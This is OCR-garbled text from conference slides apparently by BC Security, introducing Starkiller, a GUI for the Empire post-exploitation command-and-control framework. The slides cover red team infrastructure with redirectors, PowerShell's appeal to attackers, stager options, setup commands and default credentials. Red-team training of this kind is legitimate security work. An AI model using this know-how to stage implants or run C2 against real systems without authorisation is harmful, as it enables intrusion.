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Adversary Emulation 


A Red Team exercise that emulates how adversaries 
operate and follows similar tactics, techniques, and 
procedures (TTPs) to obtain a specific objective. 


Red Team Infrastructure 


e Stage payloads, control 
implants, and store target 
data just like Advanced 
Persistent Threats (APTs) 


e We don't want the discovery 
of 
a single domain or endpoint to 
compromise the whole 
operation 


It's how real adversaries 
run their operations 
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What is Starkiller? 


eIntuitive Command and 
Control (C2) Interface 


Multi-User Support 
°On-the-fly Reporting 
‘Simplified Workflows 
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New Stager 
= Author: @xorrior 
= 
GF Commen ts: 
Description: Generates an Empire Application. 
ses 
/applicat 
F 
Listener 
© 
a http 
gp 
x64 
Language 
pyth 
OutFile 
/tmp/out.zip 


SafeChecks 


Trita 
Copyright (c) 2020 BC Security | Starkiller | Empire 


Empire 

°Post-Exploitation Framework built 
around PowerShell and Python 

°Can be ran as a Team Server or All-in- 
one C2 

‘Adaptive Modules 

‘Original project ended support in 
August 2019 


"Still being maintained as a Fork by us 
#https://github.com/BC-SECURITY/Empire 


Why PowerShell? 


Gives Full .NET Access — 
Direct access to Win32 API E ii 


Red teams and MS: 


O pe rates | n Memo ry Powershell abuse is totally played out. Glad that 
l problem is solved. 
Installed by default in 7 
. Real world criminal groups and most APT attackers: 
Windows STILL POWERSHELL ALL DAY BABY 


(Meaning: actually make sure you have PS abuse well- 
defended before you worry about the latest C# 
hotness.) 


axs ClearSky Cyber Security @ClearskySec - Dec 23, 2019 


#OilRig targets LANDesk Agent users via PowDesk - New PowerShell-based 
malware resembles QUADAGENT. 

PowDesk checks for the presence of LANDesk Agent folder and service before 
C&C beacon. 

Full analysis coming soon. 

virustotal.com/gui/file/8406c... 


Ef Elsa https://github.com/BC-SECURITY/Starkiller 


Red Team Infrastructure w/Starkiller 


STARKILLER 


REDIRECTOR 1 


MPIRE SERVER AWS SERVER 


STARKILLER TARGET 


REDIRECTOR 
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STARKILLER 


Starkiller 


‘Remote control of Empire (from a distance) 
Option to run solo or as a team 
e Goal: 

1. More efficient Red Team workflows 

2. Team-oriented engagements 


GET/POST GET/POST 
PUT/DELETE PUT/DELETE 


JSON 


STARKILLER 


EMPIRE SERVER 


Starkiller Setup 
Run Empire with its API 
e  .fempire --rest 
Default login 


"Username: empireadmin He 
“Password: password123 en 
s Multiplatform =e 
"Windows Een = 
"MacOS een 


“Linux ET 
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DEMO TIME 


https://github.com/BC-SECURITY/Starkiller 
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Questions? 


DS RITY.ORG 


| À @BCSECURITY1 
HTTPS://GITHUB.COM/BC-SECURITY/STARKILLER 
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